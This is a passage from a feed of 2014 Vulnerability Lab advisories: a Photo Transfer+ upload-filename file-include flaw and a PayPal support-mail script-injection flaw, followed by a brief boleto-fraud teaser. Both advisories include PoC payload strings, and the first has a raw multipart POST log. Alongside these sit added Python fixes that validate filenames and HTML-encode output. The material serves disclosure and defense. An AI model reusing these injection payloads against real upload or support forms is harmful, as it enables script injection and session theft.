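    "a/b.png", backslashes), names starting with a dot, markup characters
    (the advisory's payload begins with '>"./') and extensions outside the
    allow-list.
    """
    if name != os.path.basename(name) or '\\' in name or '\x00' in name:
        raise BadFilename('path components are not allowed: %r' % name)
    if not _NAME_RE.match(name):
        raise BadFilename('name contains disallowed characters: %r' % name)
    if os.path.splitext(name)[1].lower() not in _ALLOWED_EXT:
        raise BadFilename('extension not allowed: %r' % name)
    return name


def is_valid_name(name):
    """Boolean form of validate_name for filters and tests."""
    try:
        validate_name(name)
        return True
    except BadFilename:
        return False


def destination(album_dir, name):
    """Resolve the storage path and prove it stays inside album_dir.

    validate_name already refuses path components; this second check is
    the safety net if the allow-list is ever loosened, and it also catches
    an album_dir that is itself a symlink to somewhere else.
    """
    root = os.path.realpath(album_dir)
    target = os.path.realpath(os.path.join(root, validate_name(name)))
    if os.path.dirname(target) != root:
        raise BadFilename('resolved outside album directory: %r' % name)
    return target


def album_title_html(name):
    """Render a stored name inside the listing's album-title div. The value is
    HTML-encoded, so '>"<iframe ...' is displayed as text, not parsed."""
    return '<div class="album-title">%s</div>' % html.escape(name, quote=True)


if __name__ == '__main__':
    with tempfile.TemporaryDirectory() as album:
        print(destination(album, 'holiday 01.png'))
        for bad in ('./evil.png', '../../etc/passwd', '>"./x.png', 'a/b.png', 'shell.php'):
            try:
                destination(album, bad)
            except BadFilename as e:
                print('rejected:', e)
    print(album_title_html('>"<iframe src=a>x.png'))
```

The same `validate_name` applies to `albumname`; an album name that passes it can never carry `./` into a directory path, and whatever is stored is encoded once more at render time so the listing cannot be used as the injection sink the PoC relies on.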


Request Method(s):
                                [+] [POST]

Vulnerable Module(s):
                                [+] uploadPhotoPost

Vulnerable Parameter(s):
                                [+] filename & albumname

Affected Module(s):
                                [+] Index Path Dir Listing (http://localhost/)


Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by attackers on the same Wi-Fi network without a privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


PoC: Url
http://localhost/./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]


PoC: Exploit Photo Transfer.htm

<div class="album-title">>"./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png</div>
<a href="/group/1/0/100"><img class="album-overlay" alt="" width="140" height="160" src="/cvab-overlay.png">
<img class="album-thumb" width="90" height="90" alt="" src="/api/group/poster/1">                                    </a>
                       <!-- <div class="album-folder-img"><img alt="" width="140" height="160" src="/cvab.png"></div> -->
                    </div>
                </div>
            </div>
            <!--end of preview thumbnails -->
        </div>
        <!-- end of wrapper-->
        <div id="upload" class="wrapper">
            <div id="intro">
                <div class="col-1 padding-t20">
                    <!-- <h1><a href="/uploadPage"><img src="/upload.png" alt="" width="76" height="76"><br><br> -->
                    <!-- UPLOAD</a></h1> -->
                    <!-- <h2 class="center">Photos FROM This Computer</h2> -->
                </div>
            </div>
        </div>
        <!-- end of wrapper-->
        <div id="container">
            <div id="bg">
            </div>
        </div>
        <!-- end of container and background-->
        <div class="menu-bg ui-dark rad-0 center">
            <div class="logo">
                <a href="/groups">Photo Transfer +</a></div>
        </div>
        <!-- menu -->
    </body>
</html>
</iframe></div>



--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/uploadPhotoPost Load Flags[LOAD_BYPASS_CACHE  ] Content size[7] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost/uploadpage]
      Content-Length[818]
      Content-Type[multipart/form-data; boundary=---------------------------4611772826829]
      Cookie[plupload_ui_view=thumbs]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST data:
      POST_DATA[-----------------------------4611772826829
Content-Disposition: form-data; name="name"

./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png
-----------------------------4611772826829
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"
Content-Type: image/png


Status: 200[OK]
GET http://localhost/main/home Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content size[210] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost/uploadpage]
      Cookie[plupload_ui_view=thumbs]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[210]
      Connection[keep-alive]
      Date[Tue, 16 Sep 2014 15:07:38 GMT]



Solution - Fix & Patch:
=======================
The vulnerability can be patched by parsing and encoding the file name value on the server side of the upload POST request (and of the sync path).
Encode the directory-listing file names and all data output values so that an uploaded name can no longer be used for file include or script
injection, and restrict the permitted file name extensions to fully secure the upload mechanism.
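The following is an added example, not code from the Photo Transfer+ application or from this advisory. It shows the fix described above in working form: a constructed multipart/form-data body in the shape of the `uploadPhotoPost` request from the session log is parsed with Python's standard-library email parser, the `name` field and the `file` part's filename are validated as plain image base names (no `./`, `../` or separator components, no HTML metacharacters, allow-listed extension), and the accepted name is HTML-encoded before it is written into the album listing. The handler, the `build_body` helper and the sample payloads are assumptions; only the endpoint, the field names and the boundary come from the PoC log.

```python
"""Hardened handling of the upload request shown in the PoC session log.

Added example, not code from the Photo Transfer+ app or the advisory. The
endpoint, field names and boundary come from the advisory's request log; the
handler and the sample payloads are constructed for this demonstration.
"""
import email
import html
import posixpath
import re

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
# One base name: alphanumeric start, then a bounded run of safe characters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,127}$")


def validate_upload_filename(raw: str) -> str:
    """Return the file name if it is a plain image base name, else raise ValueError."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in raw):
        raise ValueError("control character in file name")
    # Windows clients send backslashes; normalise before taking the base name.
    base = posixpath.basename(raw.replace("\\", "/"))
    if base in ("", ".", "..") or base != raw:
        # "./x.png", "../x.png" and "dir/x.png" all land here.
        raise ValueError(f"directory component in file name: {raw!r}")
    if not SAFE_NAME.match(base):
        raise ValueError(f"disallowed characters in file name: {raw!r}")
    if posixpath.splitext(base)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {raw!r}")
    return base


def is_safe_filename(raw: str) -> bool:
    """Boolean wrapper around validate_upload_filename for quick checks."""
    try:
        validate_upload_filename(raw)
        return True
    except ValueError:
        return False


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Split a multipart/form-data body into {field: text | (filename, bytes)}
    using the standard-library email parser (the body is wrapped in a MIME header)."""
    raw = f"Content-Type: {content_type}\r\nMIME-Version: 1.0\r\n\r\n".encode() + body
    msg = email.message_from_bytes(raw)
    fields = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_param("filename", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        if filename is None:
            fields[name] = data.decode("utf-8", "replace").strip()
        else:
            fields[name] = (filename, data)
    return fields


def render_album_title(name: str) -> str:
    """Output-encode the name before it is written into the album listing page."""
    return f'<div class="album-title">{html.escape(name, quote=True)}</div>'


def handle_upload(content_type: str, body: bytes) -> dict:
    """Validate both the `name` field and the part's filename; accept only if they agree."""
    fields = parse_multipart(content_type, body)
    try:
        if not isinstance(fields.get("file"), tuple):
            raise ValueError("no file part in request")
        filename, _data = fields["file"]
        safe = validate_upload_filename(filename)
        if validate_upload_filename(fields["name"]) != safe:
            raise ValueError("name field does not match uploaded file name")
    except (KeyError, ValueError) as exc:
        return {"accepted": False, "error": str(exc)}
    return {"accepted": True, "filename": safe, "title_html": render_album_title(safe)}


def build_body(boundary: str, name: str, filename: str, data: bytes) -> bytes:
    """Constructed request body in the shape of the PoC log (demo helper only)."""
    return (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="name"\r\n\r\n{name}\r\n'
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        f"Content-Type: image/png\r\n\r\n"
    ).encode() + data + f"\r\n--{boundary}--\r\n".encode()


BOUNDARY = "---------------------------4611772826829"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
# Constructed payloads: one in the shape of the PoC (leading "./" plus a script
# tag in both the name field and the part filename), one well-formed upload.
MALICIOUS_BODY = build_body(BOUNDARY, "./<script>alert(1)</script>.png",
                            "./<script>alert(1)</script>.png", b"fake png bytes")
CLEAN_BODY = build_body(BOUNDARY, "holiday.png", "holiday.png", b"fake png bytes")

if __name__ == "__main__":
    print(handle_upload(CONTENT_TYPE, MALICIOUS_BODY))
    print(handle_upload(CONTENT_TYPE, CLEAN_BODY))
```

The `name` field and the part filename are validated independently and then required to agree, because the PoC carries the payload in both; validating only one of them leaves the other as the value that reaches the directory listing.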


Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value of the application is estimated as high.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability

Document Title:
===============
Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=660


Release Date:
=============
2014-09-18


Vulnerability Laboratory ID (VL-ID):
====================================
660


Common Vulnerability Scoring System:
====================================
3.2


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (it can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4 and 9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability in the official PayPal Inc merchant online-service web application.


Vulnerability Disclosure Timeline:
==================================
2014-09-18:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation vulnerability was detected in the official PayPal Inc Merchant web application (Customer/Pro/Seller).
The vulnerability allows remote attackers to inject their own malicious script code into the application side of the online service.

The bug allows remote attackers to inject persistent malicious script code on the application side of the PayPal merchant technical support service.
The vulnerability is located in the `Frage Sie uns > Frage übermitteln` (Ask us > Submit question) module, in the connected `data` value that is
listed unencoded in the notification mail. The issue is remotely exploitable and the request method used to inject the payload is POST.


Exploitation of the vulnerability requires a low privileged application user account and low or medium user interaction. Successful exploitation
of the vulnerability can lead to session hijacking, persistent phishing, persistent external redirects to malicious sources and persistent
manipulation of affected or connected module web context.

Request Method(s):
                        [+] POST
Vulnerable Type(s):
                        [+] Paypal Merchant Accounts

Vulnerable Site(s):
                        [+] Paypal Merchant Technical Support (ppmts.custhelp.com/app/ask)

Vulnerable Module(s):
                        [+] Frage Sie uns > Frage übermitteln

Vulnerable Parameter(s):
                        [+] data

Affected Section(s):
                        [+] Notification Mail - Listing Account


Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by remote attackers with low or medium user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps provided below.

Review:  Notification Mail - Listing Account

<tbody><tr><td colspan="2" bgcolor="#E0E0E0"><b> Fragereferenznummer:120711-000465</b></td></tr>
<tr><td colspan="2"><table cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td class="label" align="right" nowrap="nowrap" width="250px"><b>Übersicht: </b></td>
<td class="data">">"<[PERSISTENT INJECTED SCRIPT CODE])' <<="" td=""></tr>
<tr><td class="label" align="right" width="250px" nowrap><b>Produktebene 1: </b></td>
<td class="data">Magento</td></tr><tr><td class="label" align="right" width="250px" nowrap><b>Erstellungsdatum: &l

URL: https://ppmts.custhelp.com/app/ask

Note: not only the submitting user receives the unencoded payload in the notification mail; the watcher in the backend of the application service is affected as well.


Solution - Fix & Patch:
=======================
The vulnerability can be patched by restricting the input of the `Frage Stellen` (Ask a question) module. To prevent execution it is also required to parse and
encode the vulnerable `data` value before it is written into the notification mail. The issue has been resolved by PayPal Inc.
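The following is an added example, not PayPal's code or the support portal's own code. It shows the encoding fix in working form: the submitted question fields are rendered into the HTML notification that goes to both the submitter and the backend watcher, with every interpolated value HTML-encoded (quotes included, since the PoC payload opens with a quote to break out of an attribute), the unencoded rendering that this advisory describes is kept beside it for contrast, and a small regression check confirms that no raw user input containing HTML metacharacters survives in the rendered mail. The field names, the recipient addresses and the payload are constructed for the demonstration; the reference number and the `Magento` product value are taken from the mail excerpt above.

```python
"""Output encoding for the support-ticket notification mail.

Added example, not PayPal's or the support portal's own code. Field names,
recipients and the payload are constructed; the ticket layout is modelled on
the advisory's mail excerpt.
"""
import html
import re
from email.message import EmailMessage

ROW = '<tr><td class="label"><b>{label}:</b></td><td class="data">{value}</td></tr>'
# Characters that can open a tag or break out of an attribute value.
METACHARS = re.compile(r"""[<>"']""")


def render_ticket_html_unencoded(reference: str, fields: dict) -> str:
    """The vulnerable shape: values are concatenated into the table as-is."""
    rows = [ROW.format(label=k, value=v) for k, v in fields.items()]
    return (f'<table><tr><td colspan="2"><b>Reference: {reference}</b></td></tr>'
            + "".join(rows) + "</table>")


def render_ticket_html(reference: str, fields: dict) -> str:
    """Hardened shape: html.escape with quote=True on every value, labels and
    reference included, so both tag injection and attribute break-out are neutralised."""
    rows = [ROW.format(label=html.escape(k, quote=True), value=html.escape(v, quote=True))
            for k, v in fields.items()]
    return (f'<table><tr><td colspan="2"><b>Reference: {html.escape(reference, quote=True)}</b></td></tr>'
            + "".join(rows) + "</table>")


def unescaped_input_leaks(rendered_html: str, inputs) -> list:
    """Return every input that contains a metacharacter and still appears verbatim
    in the rendered HTML; an empty list means every such value was encoded."""
    return [v for v in inputs if METACHARS.search(v) and v in rendered_html]


def build_notification(sender: str, recipients: list, reference: str, fields: dict) -> EmailMessage:
    """Notification with a text/plain part and the encoded HTML part, addressed to
    the submitter and the backend watcher alike, since both render the same data."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = ", ".join(recipients)
    msg["Subject"] = f"Question reference {reference} received"
    plain = "\n".join(f"{k}: {v}" for k, v in fields.items())
    msg.set_content(f"Reference: {reference}\n{plain}\n")
    msg.add_alternative(render_ticket_html(reference, fields), subtype="html")
    return msg


def html_part(msg: EmailMessage) -> str:
    """Decoded text of the HTML alternative (what a mail client renders)."""
    return msg.get_body(preferencelist=("html",)).get_content()


# Constructed ticket in the shape of the advisory's mail excerpt; the summary
# carries a quote-then-tag payload like the PoC.
REFERENCE = "120711-000465"
PAYLOAD = '">"<script>alert(document.cookie)</script>'
FIELDS = {"Summary": PAYLOAD, "Product level 1": "Magento"}
RECIPIENTS = ["submitter@example.com", "support-watcher@example.com"]  # assumed addresses

if __name__ == "__main__":
    print(unescaped_input_leaks(render_ticket_html_unencoded(REFERENCE, FIELDS), [PAYLOAD]))
    print(unescaped_input_leaks(render_ticket_html(REFERENCE, FIELDS), [PAYLOAD]))
    print(html_part(build_notification("noreply@example.com", RECIPIENTS, REFERENCE, FIELDS)))
```

The check in `unescaped_input_leaks` is the kind of assertion worth keeping in the mail template's test suite: it fails whenever a value with a metacharacter reaches the rendered HTML unchanged, regardless of which template field it came through.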

Security Risk:
==============
The security risk of the persistent input validation mail encoding vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]



Attacks against Boletos

José is a very suspicious person. He never uses internet banking services or buys anything using a credit card. Indeed, he doesn't even have one. He doesn't trust any of these modern technologies in the slightest. He's well aware of all the risks that exist online, so José prefers to keep his life offline. However, not even that could save him from today's cybercriminals. He lost more than $2,000 in a single day: José was p0wned by a barcode and a piece of paper.

More here: http://securelist.com/analysis/publications/66591/attacks-against-boletos/